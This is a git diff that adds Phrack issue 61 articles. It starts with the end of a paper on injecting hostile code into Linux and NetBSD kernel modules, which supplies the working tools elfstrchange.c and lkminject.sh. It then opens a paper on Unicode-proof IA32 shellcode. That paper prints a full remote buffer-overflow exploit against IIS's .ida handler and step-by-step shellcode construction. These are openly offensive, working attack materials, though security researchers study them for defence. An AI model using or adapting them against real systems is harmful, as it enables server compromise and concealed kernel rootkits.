+inject_entry(struct lkm_table *lkmt, int cmd, int ver)
+{
+	switch(cmd) {
+	case LKM_E_LOAD:
+		printf("evil: in place\n");
+		break;
+	case LKM_E_UNLOAD:
+		printf("evil: i'll be back!\n");
+		break;
+	case LKM_E_STAT:
+		printf("evil: report in progress\n");
+		break;
+	default:
+		printf("edit: unknown command\n");
+		break;
+	}
+
+	return gentil_lkmentry(lkmt, cmd, ver);
+}
+
+  After compiling gentil and evil we link them together:
+  
+$ ld -r -o evil.o gentil.o inject.o
+$ mv evil.o gentil.o
+
+# modload -e evil_entry gentil.o
+Module loaded as ID 2
+
+# modstat 
+Type    Id   Offset Loadaddr Size Info     Rev Module Name
+DEV       0  -1/108 d3ed3000 0004 d3ed3440   1 mmr
+DEV       1  -1/180 d3fa6000 03e0 d4090100   1 nvidia
+MISC      2       0 e45b9000 0004 e45b9254   1 gentil
+
+# modunload -n gentil
+
+# dmesg | tail
+evil: in place
+gentil: Hello, world!
+evil: report in progress
+gentil: How you doin', world?
+evil: i'll be back!
+gentil: Goodbye, world!
+
+  
+  Ok, everything worked like a charm :)
+          
+
+------[ 5.2.3 - OpenBSD
+
+  OpenBSD don't use ELF on x86 architectures, so the tech cannot be used.
+I've not tested on platforms that use ELF but i think that it looks like
+NetBSD, so the tech can certainly be applied. Tell me if you manage to do
+it on OpenBSD ELF.
+
+
+
+--[ 6 - Conclusion
+  
+  This paper has enlarged the number of techniques that allows to 
+dissimulate code into the kernel. I have presented this technique because  
+it is interesting to do it with very few and easy manipulations. 
+  Have fun when playing with it :)
+
+
+
+--[ 7 - Greetings
+
+  I want to thanks mycroft, OUAH, aki and afrique for their comments and 
+ideas. Also a big thanks to klem for teaching me reverse engineering.
+  Thanks to FXKennedy for helping me with NetBSD.
+  A big kiss to Carla for being wonderfull.
+  And finally, thanks to all #root people, `spud, hotfyre, funka, jaia, 
+climax, redoktober ...
+
+
+
+--[ 8 - References
+
+
+  [1] Weakening the Linux Kernel by Plaguez
+      http://www.phrack.org/show.php?p=52&a=18
+    
+  [2] The Adore rootkit by stealth
+      http://stealth.7350.org/rootkits/
+
+  [3] Runtime kernel kmem patching by Silvio Cesare
+      http://vx.netlux.org/lib/vsc07.html
+    
+  [4] Static Kernel Patching by jbtzhm
+      http://www.phrack.org/show.php?p=60&a=8
+
+  [5] Tool interface specification on ELF 
+      http://segfault.net/~scut/cpu/generic/TIS-ELF_v1.2.pdf
+
+  [6] Modutils for 2.4.x kernels 
+      ftp://ftp.kernel.org/pub/linux/utils/kernel/modutils/v2.4
+
+  [7] Tripwire
+      http://www.tripwire.org
+    
+  [8] Solaris Loadable Kernel Modules by Plasmoid
+      http://www.thc.org/papers/slkm-1.0.html
+      
+    
+
+--[ 9 - Codes
+
+----[ 9.1 - ElfStrChange
+
+/*
+ * elfstrchange.c by truff <truff@projet7.org>
+ * Change the value of a symbol name in the .strtab section
+ *
+ * Usage: elfstrchange elf_object sym_name sym_name_replaced
+ *
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <elf.h>
+
+#define FATAL(X) { perror (X);exit (EXIT_FAILURE); }
+
+
+int ElfGetSectionName (FILE *fd, Elf32_Word sh_name, 
+                       Elf32_Shdr *shstrtable, char *res, size_t len);
+                       
+Elf32_Off ElfGetSymbolByName (FILE *fd, Elf32_Shdr *symtab, 
+                       Elf32_Shdr *strtab, char *name, Elf32_Sym *sym);
+                       
+Elf32_Off ElfGetSymbolName (FILE *fd, Elf32_Word sym_name, 
+                       Elf32_Shdr *strtable, char *res, size_t len);
+
+
+int main (int argc, char **argv)
+{
+  int i;
+  int len = 0;
+  char *string;
+  FILE *fd;
+  Elf32_Ehdr hdr;
+  Elf32_Shdr symtab, strtab;
+  Elf32_Sym sym;
+  Elf32_Off symoffset;
+
+  fd = fopen (argv[1], "r+");
+  if (fd == NULL)
+    FATAL ("fopen");
+
+  if (fread (&hdr, sizeof (Elf32_Ehdr), 1, fd) < 1)
+    FATAL ("Elf header corrupted");
+
+  if (ElfGetSectionByName (fd, &hdr, ".symtab", &symtab) == -1)
+  {
+    fprintf (stderr, "Can't get .symtab section\n");
+    exit (EXIT_FAILURE);
+  }
+    
+  if (ElfGetSectionByName (fd, &hdr, ".strtab", &strtab) == -1)
+  {
+    fprintf (stderr, "Can't get .strtab section\n");
+    exit (EXIT_FAILURE);
+  }
+    
+
+  symoffset = ElfGetSymbolByName (fd, &symtab, &strtab, argv[2], &sym);
+  if (symoffset == -1)
+  {
+    fprintf (stderr, "Symbol %s not found\n", argv[2]);
+    exit (EXIT_FAILURE);
+  }
+  
+  
+  printf ("[+] Symbol %s located at 0x%x\n", argv[2], symoffset);
+  
+  if (fseek (fd, symoffset, SEEK_SET) == -1)
+    FATAL ("fseek");
+
+  if (fwrite (argv[3], 1, strlen(argv[3]), fd) < strlen (argv[3]))
+    FATAL ("fwrite");
+  
+  printf ("[+] .strtab entry overwriten with %s\n", argv[3]);
+  
+  fclose (fd);
+
+  return EXIT_SUCCESS;
+}
+
+Elf32_Off ElfGetSymbolByName (FILE *fd, Elf32_Shdr *symtab, 
+            Elf32_Shdr *strtab, char *name, Elf32_Sym *sym)
+{
+  int i;
+  char symname[255];
+  Elf32_Off offset;
+
+  for (i=0; i<(symtab->sh_size/symtab->sh_entsize); i++)
+  {
+    if (fseek (fd, symtab->sh_offset + (i * symtab->sh_entsize), 
+               SEEK_SET) == -1)
+      FATAL ("fseek");
+    
+    if (fread (sym, sizeof (Elf32_Sym), 1, fd) < 1)
+      FATAL ("Symtab corrupted");
+    
+    memset (symname, 0, sizeof (symname));
+    offset = ElfGetSymbolName (fd, sym->st_name, 
+                        strtab, symname, sizeof (symname));
+    if (!strcmp (symname, name))
+      return offset;
+  }
+  
+  return -1;
+}
+
+
+int ElfGetSectionByIndex (FILE *fd, Elf32_Ehdr *ehdr, Elf32_Half index, 
+    Elf32_Shdr *shdr)
+{
+  if (fseek (fd, ehdr->e_shoff + (index * ehdr->e_shentsize), 
+             SEEK_SET) == -1)
+    FATAL ("fseek");
+  
+  if (fread (shdr, sizeof (Elf32_Shdr), 1, fd) < 1)
+    FATAL ("Sections header corrupted");
+
+  return 0;
+}
+  
+
+int ElfGetSectionByName (FILE *fd, Elf32_Ehdr *ehdr, char *section, 
+                         Elf32_Shdr *shdr)
+{
+  int i;
+  char name[255];
+  Elf32_Shdr shstrtable;
+
+  /*
+   * Get the section header string table
+   */
+  ElfGetSectionByIndex (fd, ehdr, ehdr->e_shstrndx, &shstrtable);
+  
+  memset (name, 0, sizeof (name));
+
+  for (i=0; i<ehdr->e_shnum; i++)
+  {
+    if (fseek (fd, ehdr->e_shoff + (i * ehdr->e_shentsize), 
+               SEEK_SET) == -1)
+      FATAL ("fseek");
+    
+    if (fread (shdr, sizeof (Elf32_Shdr), 1, fd) < 1)
+      FATAL ("Sections header corrupted");
+    
+    ElfGetSectionName (fd, shdr->sh_name, &shstrtable, 
+                       name, sizeof (name));
+    if (!strcmp (name, section))
+    {
+      return 0;
+    }
+  }
+  return -1;
+}
+
+
+int ElfGetSectionName (FILE *fd, Elf32_Word sh_name, 
+    Elf32_Shdr *shstrtable, char *res, size_t len)
+{
+  size_t i = 0;
+  
+  if (fseek (fd, shstrtable->sh_offset + sh_name, SEEK_SET) == -1)
+    FATAL ("fseek");
+  
+  while ((i < len) || *res == '\0')
+  {
+    *res = fgetc (fd);
+    i++;
+    res++;
+  }
+  
+  return 0;
+}
+
+
+Elf32_Off ElfGetSymbolName (FILE *fd, Elf32_Word sym_name, 
+    Elf32_Shdr *strtable, char *res, size_t len)
+{
+  size_t i = 0;
+  
+  if (fseek (fd, strtable->sh_offset + sym_name, SEEK_SET) == -1)
+    FATAL ("fseek");
+  
+  while ((i < len) || *res == '\0')
+  {
+    *res = fgetc (fd);
+    i++;
+    res++;
+  }
+  
+  return (strtable->sh_offset + sym_name);
+}
+/* EOF */
+
+
+
+----] 9.2 Lkminject
+
+#!/bin/sh 
+#
+# lkminject by truff (truff@projet7.org)
+#
+# Injects a Linux lkm into another one.
+#
+# Usage:
+# ./lkminfect.sh original_lkm.o evil_lkm.c
+#
+# Notes:
+# You have to modify evil_lkm.c as explained bellow:
+# In the init_module code, you have to insert this line, just after
+# variables init:
+# dumm_module ();
+#
+# In the cleanup_module code, you have to insert this line, just after
+# variables init:
+# dummcle_module ();
+#
+#      http://www.projet7.org                  - Security Researchs -
+###########################################################################
+
+
+sed -e s/init_module/evil_module/ $2 > tmp
+mv tmp $2
+
+sed -e s/cleanup_module/evclean_module/ $2 > tmp
+mv tmp $2
+
+# Replace the following line with the compilation line for your evil lkm 
+# if needed. 
+make
+
+ld -r $1 $(basename $2 .c).o -o evil.o
+
+./elfstrchange evil.o init_module dumm_module
+./elfstrchange evil.o evil_module init_module
+./elfstrchange evil.o cleanup_module dummcle_module
+./elfstrchange evil.o evclean_module cleanup_module
+
+mv evil.o $1
+rm elfstrchange
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/11.txt b/phrack61/11.txt
new file mode 100644
index 0000000..839a4c0
--- /dev/null
+++ b/phrack61/11.txt
@@ -0,0 +1,1279 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x0b of 0x0f
+
+|=------------=[ Building IA32 'Unicode-Proof' Shellcodes ]=-------------=|
+|=-----------------------------------------------------------------------=|
+|=------------=[ obscou <obscou@dr.com||wishkah@chek.com> ]=-------------=|
+
+
+
+           
+--[ Contents
+
+  0 - The Unicode Standard
+
+  1 - Introduction
+
+  2 - Our Instructions set
+
+  3 - Possibilities
+
+  4 - The Strategy
+
+  5 - Position of the code
+
+  6 - Conclusion
+
+  7 - Appendix : Code
+
+
+--[ 0 - The Unicode Standard
+
+While   exploiting   buffer   overflows,   we  sometime face a difficulty : 
+character transformations. In fact, the exploited program may have modified
+our buffer, by setting it to lower/upper case, or by getting rid of 
+non-alphanumeric characters, thus stopping the attack as our shellcode 
+usually can't run anymore. The transformation we are dealing here with is
+the transformation of a C-type string (common zero terminated string) to a
+Unicode string.
+
+
+Here is a quick overview of what Unicode is (source : www.unicode.org)
+
+
+	"What is Unicode?
+	Unicode provides a unique number for every character,
+	no matter what the platform,
+	no matter what the program,
+	no matter what the language."
+
+		--- www.unicode.org
+
+In fact, because Internet has become so popular, and because we all have
+different languages and therefore different charaters, there is now a need
+to have a standard so that computers can exchange data whatever the
+program, platform, language, network etc...
+Unicode is a 16-bits character set capable of encoding all known characters
+and used as a worldwide character-encoding standard.
+
+Today, Unicode is used by many industry leaders such as :
+
+	Apple
+	HP
+	IBM
+	Microsoft
+	Oracle
+	Sun
+	and many others...
+
+The Unicode standard is requiered by softwares like : 
+(non exhaustive list, see unicode.org for full list)
+
+Operating Systems :
+
+	Microsoft Windows CE, Windows NT, Windows 2000, and Windows XP 
+	GNU/Linux with glibc 2.2.2 or newer - FAQ support 
+	Apple Mac OS 9.2, Mac OS X 10.1, Mac OS X Server, ATSUI 
+	Compaq's Tru64 UNIX, Open VMS 
+	IBM AIX, AS/400, OS/2 
+	SCO UnixWare 7.1.0 
+	Sun Solaris 
+
+And of course, any software that runs under thoses systems...
+
+http://www.unicode.org/charts/ : displays the Unicode table of caracters
+It looks like this :
+
+|   Range   |	Character set
+|-----------|--------------------
+| 0000-007F | Basic Latin
+| 0080-00FF | Latin-1 Supplement
+| 0100-017F | Latin Extended-A
+|   [...]   |      [...]
+| 0370-03FF | Greek and Coptic
+|   [...]   |      [...]
+| 0590-05FF | Hebrew
+| 0600-06FF | Arabic
+|   [...]   |      [...]
+| 3040-309F | Japanese Hiragana
+| 30A0-30FF | Japanese Katakana
+
+
+.... and so on until everybody is happy !
+
+Unicode 4.0 includes characters for :
+
+ Basic Latin				Block Elements 
+ Latin-1 Supplement  			Geometric Shapes 
+ Latin Extended-A  			Miscellaneous Symbols 
+ Latin Extended-B  			Dingbats 
+ IPA Extensions  			Miscellaneous Math. Symbols-A 
+ Spacing Modifier Letters  		Supplemental Arrows-A 
+ Combining Diacritical Marks  		Braille Patterns 
+ Greek  Supplemental 			Arrows-B 
+ Cyrillic  Miscellaneous 		Mathematical Symbols-B 
+ Cyrillic Supplement  			Supplemental Mathematical Operators
+ Armenian  				CJK Radicals Supplement 
+ Hebrew  				Kangxi Radicals 
+ Arabic  				Ideographic Description Characters
+ Syriac  				CJK Symbols and Punctuation 
+ Thaana  				Hiragana 
+ Devanagari  				Katakana 
+ Bengali  				Bopomofo 
+ Gurmukhi  				Hangul Compatibility Jamo 
+ Gujarati  				Kanbun 
+ Oriya  				Bopomofo Extended 
+ Tamil  				Katakana Phonetic Extensions 
+ Telugu  				Enclosed CJK Letters and Months 
+ Kannada  				CJK Compatibility
+ Malayalam  				CJK Unified Ideographs Extension A
+ Sinhala  				Yijing Hexagram Symbols
+ Thai  					CJK Unified Ideographs
+ Lao  					Yi Syllables
+ Tibetan  				Yi Radicals
+ Myanmar  				Hangul Syllables
+ Georgian 				High Surrogates
+ Hangul Jamo  				Low Surrogates
+ Ethiopic  				Private Use Area
+ Cherokee  				CJK Compatibility Ideographs
+ Unified Canadian Aboriginal Syllabic  	Alphabetic Presentation Forms
+ Ogham  				Arabic Presentation Forms-A
+ Runic  				Variation Selectors
+ Tagalog 				Combining Half Marks
+ Hanunoo  				CJK Compatibility Forms
+ Buhid  				Small Form Variants
+ Tagbanwa  				Arabic Presentation Forms-B
+ Khmer  				Halfwidth and Fullwidth Forms
+ Mongolian  				Specials
+ Limbu  				Linear B Syllabary
+ Tai Le  				Linear B Ideograms
+ Khmer Symbols 				Aegean Numbers
+ Phonetic Extensions  			Old Italic
+ Latin Extended 			Additional  Gothic
+ Greek Extended  			Deseret
+ General Punctuation  			Shavian
+ Superscripts and Subscripts 		Osmanya
+ Currency Symbols  			Cypriot Syllabary
+ Combining Marks for Symbols  		Byzantine Musical Symbols
+ Letterlike Symbols  			Musical Symbols
+ Number Forms  				Tai Xuan Jing Symbols
+ Arrows  				Mathematical Alphanumeric Symbols
+ Mathematical Operators  		CJK Unified Ideographs Extension B
+ Miscellaneous Technical  		CJK Compatibility Ideographs Supp.
+ Control Pictures  			Tags
+ Optical Character Recognition  	Variation Selectors Supplement 
+ Enclosed Alphanumerics  		Supplementary Private Use Area-A 
+ Box Drawing  				Supplementary Private Use Area-B 
+
+Yes it's impressive.
+
+
+Microsoft says :
+
+"Unicode is a worldwide character-encoding standard. Windows NT, Windows
+2000, and Windows XP use it exclusively at the system level for character
+and string manipulation. Unicode simplifies localization of software and
+improves multilingual text processing. By implementing it in your
+applications, you can enable the application with universal data exchange
+capabilities for global marketing, using a single binary file for every
+possible character code."
+Wa have to notice that The Windows programming interface uses ANSI and
+Unicode API's for each API, for example: 
+
+The API : MessageBox (displays a msgbox of course)
+Is exported by User32.dll with : 
+		MessageBoxA	(ANSI)
+		MessageBoxW	(Unicode)
+
+MessageBoxA will accept a standard C-type string as an argument
+MessageBoxW requieres Unicode strings as arguments.
+
+According to Microsoft, internal use of strings is handled by the system
+itself that ensures a transparent translation of strings between different
+standards.
+But if you want to use ANSI in a C program compiling under windows, you
+just have to define UNICODE and every API will be replaced by its 'W'
+version.
+This sounds logical to me, let's get to the point now...
+
+
+
+--[ 1 - Introduction
+
+
+
+We will consider the following situation :
+
+You send some data to a vulnerable server, and your data is considered as
+ASCII (standard 8-bits character encoding), then your buffer is translated
+into unicode for compatibility reasons, and then an overflow occurs with
+your transformed buffer.
+
+For example, such an input buffer :
+4865 6C6C 6F20 576F 726C 6420 2100 0000 Hello World !...
+0000 0000 0000 0000 0000 0000 0000 0000 ................
+
+Would turn into :
+4800 6500 6C00 6C00 6F00 2000 5700 6F00 H.e.l.l.o. .W.o.
+7200 6C00 6400 2000 2100 0000 0000 0000 r.l.d. .!.......
+
+Then bang, overflow (yeah i know my example is stupid)
+
+Under Win32 plateforms, a process usually starts at 00401000, this makes
+it possible to smash EIP with a return address that looks like : 
+
+                         ????:00??00??
+
+So even with such a transformation, exploitation is still possible.
+It will be a lot harder to get a working shellcode.
+One possibility is to stuff the stack with untranformed data than contains
+the same shellcode many times, then do the overflow with the tranformed
+buffer, and make it return to one of your numerous shellcodes.
+Here we assume that this was impossible because all buffers are unicode.
+Needless to say that our assembly code won't go through this safely.
+So we need to find a way to build a shellcode that resists to such a 
+transformation. We need to find opcodes containing null bytes to build our
+shellcode.
+
+Here is an example, it is a bit old but it is an example of how we can
+manage to get a shellcode executed even if our sent buffer is f**cked
+(This exploit was working on my box, it runs against IIS www service) :
+
+
+---------------- CUT HERE -------------------------------------------------
+
+/* 
+   IIS .IDA remote exploit
+
+
+   formatted return address : 0x00530053
+   IIS sticks our very large buffer at 0x0052....
+   We jump to the buffer and get to the point
+   
+
+   by obscurer
+*/
+
+#include <windows.h>
+#include <winsock.h>
+#include <stdio.h>
+
+void usage(char *a);
+int wsa();
+
+/* My Generic Win32 Shellcode */
+unsigned char shellcode[]={
+"\xEB\x68\x4B\x45\x52\x4E\x45\x4C\x13\x12\x20\x67\x4C\x4F\x42\x41"
+"\x4C\x61\x4C\x4C\x4F\x43\x20\x7F\x4C\x43\x52\x45\x41\x54\x20\x7F"
+[......]
+[......]
+[......]
+"\x09\x05\x01\x01\x69\x01\x01\x01\x01\x57\xFE\x96\x11\x05\x01\x01"
+"\x69\x01\x01\x01\x01\xFE\x96\x15\x05\x01\x01\x90\x90\x90\x90\x00"};
+
+int main (int argc, char **argv)
+{
+
+int sock;
+struct hostent *host;
+struct sockaddr_in sin;
+int index;
+
+char *xploit;
+char *longshell;
+
+
+char retstring[250];
+
+if(argc!=4&&argc!=5) usage(argv[0]);
+
+
+if(wsa()==FALSE)
+{
+	printf("Error : cannot initialize winsock\n");
+	exit(0);
+}
+
+
+int size=0;
+
+if(argc==5)
+size=atoi(argv[4]);
+
+
+printf("Beginning Exploit building\n");
+
+xploit=(char *)malloc(40000+size);
+longshell=(char *)malloc(35000+size);
+if(!xploit||!longshell) 
+{
+printf("Error, not enough memory to build exploit\n");
+return 0;
+}
+
+if(strlen(argv[3])>65)
+{
+printf("Error, URL too long to fit in the buffer\n");
+return 0;
+}
+
+for(index=0;index<strlen(argv[3]);index++)
+shellcode[index+139]=argv[3][index]^0x20;
+
+memset(xploit,0,40000+size);
+memset(longshell,0,35000+size);
+memset (longshell, '\x41', 30000+size);
+
+for(index=0;index<sizeof(shellcode);index++)
+longshell[index+30000+size]=shellcode[index];
+
+longshell[30000+sizeof(shellcode)+size]=0;
+
+
+memset(retstring,'S',250);
+
+sprintf(xploit,
+        "GET /NULL.ida?%s=x HTTP/1.1\nHost: localhost\nAlex: %s\n\n",
+	retstring,
+        longshell);
+
+
+printf("Exploit build, connecting to %s:%d\n",argv[1],atoi(argv[2]));
+
+sock=socket(AF_INET,SOCK_STREAM,0);
+if(sock<0)
+{
+	printf("Error : Couldn't create a socket\n");
+	return 0;
+}
+
+
+if ((inet_addr (argv[1]))==-1) 
+    {
+	host = gethostbyname (argv[1]);
+    if (!host)
+    {
+		printf ("Error : Couldn't resolve host\n");
+		return 0;
+    }
+memcpy((unsigned long *)&sin.sin_addr.S_un.S_addr,
+       (unsigned long *)host->h_addr,
+       sizeof(host->h_addr));
+
+}
+else sin.sin_addr.S_un.S_addr=inet_addr(argv[1]);
+
+
+sin.sin_family=AF_INET;
+sin.sin_port=htons(atoi(argv[2]));
+
+index=connect(sock,(struct sockaddr *)&sin,sizeof(sin));
+if (index==-1)
+{
+	printf("Error : Couldn't connect to host\n");
+	return 0;
+}
+
+printf("Connected to host, sending shellcode\n");
+
+index=send(sock,xploit,strlen(xploit),0);
+if(index<1)
+{
+	printf("Error : Couldn't send trough socket\n");
+	return 0;
+}
+
+printf("Done, waiting for an answer\n");
+
+memset (xploit,0, 2000);
+
+index=recv(sock,xploit,100,0);
+if(index<0)
+{
+	printf("Server crashed, if exploit didn't work,
+				increase buffer size by 10000\n");
+	exit(0);
+}
+
+
+printf("Exploit didn't seem to work, closing connection\n",xploit);
+
+closesocket(sock);
+
+printf("Done\n");
+
+return 0;
+}
+---------------- CUT HERE -------------------------------------------------
+
+
+In this example, the exploitation string had to be as follows :
+
+"GET /NULL.ida?[BUFFER]=x HTTP/1.1\nHost: localhost\nAlex: [ANY]\n\n"
+
+If [BUFFER] is big enough, EIP is smashed with what it contains.
+But, i've noticed that [BUFFER] has been transformed into unicode when the
+overflow occurs. But something interesting was that [ANY] was a clean
+ASCII buffer, being mapped in memory at around : 00530000...
+So i tried to set [BUFFER] to "SSSSSSSSSSSSS" (S = 0x53)
+After the unicode transformation, it became : 
+
+...00 53 00 53 00 53 00 53 00 53 00 53 00 53 00 53 00 53...
+
+The EIP was smashed with : 0x00530053, IIS returned on somewhere around
+[ANY], where i had put a huge space of 0x41 = "A" (increments a register)
+and then, at the end of [ANY], my shellcode.
+And this worked. But if we have no clean buffer, we are unable to install
+a shellcode somewhere in memory. We have to find another solution.
+
+
+
+
+--[ 2 - Our Instructions set
+
+
+
+We must keep in mind that we can't use absolute addresses for calls, jmp...
+because we want our shellcode to be as portable as possible.
+First, we have to know which opcodes can be used, and which can't be used
+in order to find a strategy. As used in the Intel papers :
+
+r32 refers to a 32 bits register (eax, esi, ebp...)
+r8  refers to a  8 bits register (ah, bl, cl...)
+
+
+
+     - UNCONDITIONAL JUMPS (JMP)
+
+JMP's possible opcodes are EB and E9 for relative jumps, we can't use them
+as they must be followed by a byte (00 would mean a jump to the next 
+instruction which is fairly unuseful)
+
+FF and EA are absolute jumps, these opcodes can't be followed by a 00,
+except if we want to jump to a known address, which we won't do as this
+would mean that our shellcode contains harcoded addresses.
+
+
+
+     - CONDITIONAL JUMPS (Jcc : JNE, JAE, JNE, JL, JZ, JNG, JNS...)
+
+The syntaxe for far jumps can't be used as it needs 2 consecutives non null
+bytes. the syntaxe for near jumps can't be used either because the opcode 
+must be followed by the distance to jump to, which won't be 00. Also, 
+JMP r32 is impossible.
+
+
+
+     - LOOPs (LOOP, LOOPcc : LOOPE, LOOPNZ..)
+
+Same problem : E0, or E1, or E2 are LOOP opcodes, they must me followed by
+the number of bytes to cross...
+
+
+     - REPEAT (REP, REPcc : REPNE, REPNZ, REP + string operation)
+
+All this is impossible to do because thoses intructions all begin with a
+two bytes opcode.
+
+
+     - CALLs 
+
+Only the relative call can be usefull :
+E8 ?? ?? ?? ??
+In our case, we must have : 
+E8 00 ?? 00 ??    (with each ?? != 00)
+We can't use this as our call would be at least 01000000 bytes further...
+Also, CALL r32 is impossible.
+
+
+     - SET BYTE ON CONDITION (SETcc)
+
+This instruction needs 2 non nul bytes. (SETA is 0F 97  for example).
+
+
+
+Hu oh... This is harder as it may seem... We can't do any test... Because
+we can't do anything conditional ! Moreover, we can't move along our code :
+no Jumps and no Calls are permitted, and no Loops nor Repeats can be done.
+
+Then, what can we do ?
+The fact that we have a lot of NULLS will allow a lot of operation on the
+EAX register... Because when you use EAX, [EAX], AX, etc.. as operand, 
+it is often coded in Hex with a 00.
+
+
+
+     - SINGLE BYTE OPCODES
+
+We can use any single byte opcode, this will give us any INC or DEC on any
+register, XCHG and PUSH/POP are also possible, with registers as operands.
+So we can do :
+XCHG r32,r32
+POP r32
+PUSH r32
+
+Not bad.
+
+
+     - MOV
+ ________________________________________________________________
+|8800              mov [eax],al                                  |
+|8900              mov [eax],eax                                 |
+|8A00              mov al,[eax]                                  |
+|8B00              mov eax,[eax]                                 |
+|                                                                |
+|Quite unuseful.                                                 |
+|________________________________________________________________|
+
+ ________________________________________________________________
+|A100??00??        mov eax,[0x??00??00]                          |
+|A200??00??        mov [0x??00??00],al                           |
+|A300??00??        mov [0x??00??00],eax                          |
+|                                                                |
+|These are unuseful to us. (We said no hardcoded addresses).     |
+|________________________________________________________________|
+
+ ________________________________________________________________
+|B_00              mov r8,0x0                                    |
+|A4                movsb                                         |
+|                                                                |
+|Maybe we can use these ones.                                    |
+|________________________________________________________________|
+
+ ________________________________________________________________
+|B_00??00??        mov r32,0x??00??00                            |
+|C600??            mov byte [eax],0x??                           |
+|                                                                |
+|This might be interesting for patching memory.                  |
+|________________________________________________________________|
+
+
+
+     - ADD
+
+ ________________________________________________________________
+|00__              add [r32], r8                                 |
+|                                                                | 
+| Using any register as a pointer, we can add bytes in memory.   |
+|                                                                |
+|00__              add r8,r8                                     |
+|                                                                |
+| Could be a way to modify a register.                           |
+|________________________________________________________________|
+
+
+     - XOR
+
+ ________________________________________________________________
+|3500??00??        xor eax,0x??00??00                            |
+|                                                                | 
+|                                                                |
+| Could be a way to modify the EAX register.                     |
+|________________________________________________________________|
+
+
+     - PUSH
+
+ ________________________________________________________________
+|6A00              push dword 0x00000000                         |
+|6800??00??        push dword 0x??00??00                         | 
+|                                                                |
+| Only this can be made.                                         |
+|________________________________________________________________|
+
+
+--[ 3 - Possibilities
+
+
+First we have to get rid of a small detail : the fact that we have
+such 0x00 in our code may requier caution because if you return from
+smashed EIP to ADDR :
+
+... ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ...
+    ||
+   ADDR
+
+The result may be completely different if you ret to ADDR or ADDR+1 !
+But, we can use as 'NOP' instruction, instructions like : 
+
+ ________________________________________________________________
+|0400              add al,0x0                                    |
+|________________________________________________________________|
+
+Because : 000400 is : add [2*eax],al, we can jump wherever we want, we
+won't be bothered by the fact that we have to fall on a 0x00 or not.
+
+But this need 2*eax to be a valid pointer.
+We also have :
+
+ ________________________________________________________________
+|06                push es                                       |
+|0006              add [esi],al                                  |
+|                                                                |
+|0F000F            str [edi]                                     |
+|000F              add [edi],cl                                  |
+|                                                                |
+|2E002E            add [cs:esi],ch                               |
+|002E              add [esi],ch                                  |
+|                                                                |
+|2F                das                                           |
+|002F              add [edi],ch                                  |
+|                                                                |
+|37                aaa                                           |
+|0037              add [edi],dh                                  |
+|                                  ; .... etc etc...             |
+|________________________________________________________________|
+
+We are just to be careful with this alignment problem.
+
+Next, let's see what can be done :
+
+XCHG, INC, DEC, PUSH, POP 32 bits registers can be done directly
+
+We can set a register (r32) to 00000000 :
+ ________________________________________________________________
+|push dword 0x00000000                                           |
+|pop r32                                                         |
+|________________________________________________________________|
+
+Notice that anything that can be done with EAX can be done with any other 
+register thanxs to the XCHG intruction.
+
+For example we can set any value to EDX with a 0x00 at second position :
+(for example : 0x12005678):
+ ________________________________________________________________
+|mov edx,0x12005600        ; EDX = 0x12005600                    | 
+|mov ecx,0xAA007800                                              |
+|add dl,ch                 ; EDX = 0x12005678                    |
+|________________________________________________________________|
+
+
+More difficult : we can set any value to EAX (for example), but we will
+have to use a little trick with the stack :
+
+ ________________________________________________________________
+|mov eax,0xAA003400        ; EAX = 0xAA003400                    |
+|push eax                                                        |
+|dec esp                                                         |
+|pop eax                   ; EAX = 0x003400??                    |
+|add eax,0x12005600        ; EAX = 0x123456??                    |
+|mov al,0x0                ; EAX = 0x12345600                    |
+|mov ecx,0xAA007800                                              |
+|add al,ch                                                       |
+|                   ; finally : EAX = 0x12345678                 |
+|________________________________________________________________|
+
+
+Importante note : we migth want to set some 0x00 too :
+
+If we wanted a 0x00 instead of 0x12, then instead of adding 0x00120056 to
+the register, we can simply add 0x56 to ah :
+
+ ________________________________________________________________
+|mov ecx,0xAA005600                                              |
+|add ah,ch                                                       |
+|________________________________________________________________|
+
+If we wanted a 0x00 instead of 0x34, then we just need EAX = 0x00000000  to
+begin with, instead of trying to set this 0x34 byte.
+
+If we wanted a 0x00 instead of 0x56, then it is simple to substract 0x56 to
+ah by adding 0x100 - 0x56 = 0xAA to it :
+ ________________________________________________________________
+|                                     ; EAX = 0x123456??         |
+|mov ecx,0xAA00AA00                                              |
+|add ah,ch                                                       |
+|________________________________________________________________|
+
+If we wanted a 0x00 instead of the last byte, just give up the last line.
+
+Maybe if you haven't thougth of this, remember you can jump to a given
+location with (assuming the address is in EAX) :
+________________________________________________________________
+|50                push eax                                      |
+|C3                ret                                           |
+|________________________________________________________________|
+
+You may use this in case of a desperate situation.
+
+
+--[ 4 - The Strategy
+
+
+
+It seems nearly impossible to get a working shellcode with such a small set
+of opcodes... But it is not !
+The idea is the following :
+
+Given a working shellcode, we must get rid of the 00 between each byte.
+We need a loop, so let's do a loop, assuming EAX points to our shellcode :
+
+ _Loop_code_:____________________________________________________
+|                              ; eax points to our shellcode     |
+|                              ; ebx is 0x00000000               |
+|                              ; ecx is 0x00000500 (for example) |
+|                                                                |
+|          label:                                                |
+|43                inc ebx                                       |
+|8A1458            mov byte dl,[eax+2*ebx]                       |
+|881418            mov byte [eax+ebx],dl                         |
+|E2F7              loop label                                    |
+|________________________________________________________________|
+
+Problem : not unicode. So let's turn it into unicode :
+
+43 8A 14 58 88 14 18 E2 F7, would be :
+43 00 14 00 88 00 18 00 F7
+
+Then, considering the fact that we can write data at a location pointed by
+EAX, it will be simple to tranform thoses 00 into their original values.
+
+We just need to do this (we assume EAX points to our data) :
+
+ ________________________________________________________________
+|40                inc eax                                       |
+|40                inc eax                                       |
+|C60058            mov byte [eax],0x58                           |
+|________________________________________________________________|
+
+Problem : still not unicode. So that 2 bytes like 0x40 follow, we need a 
+00 between the two... As 00 can't fit, we need something like : 00??00,
+which won't interfere with our business, so :
+
+                 add [ebp+0x0],al   (0x004500)
+
+will do fine. Finally we get :
+
+ ________________________________________________________________
+|40                inc eax                                       |
+|004500            add [ebp+0x0],al                              |
+|40                inc eax                                       |
+|004500            add [ebp+0x0],al                              |
+|C60058            mov byte [eax],0x58                           |
+|________________________________________________________________|
+
+-> [40 00 45 00 40 00 45 00 C6 00 58] is nothing but a unicode string !
+
+
+Before the loop, we must have some things done : 
+First we must set a proper counter, i propose to set ECX to 0x0500, this
+will deal with a 1280 bytes shellcode (but feel free to change this).
+->This is easy to do thanks to what we just noticed.
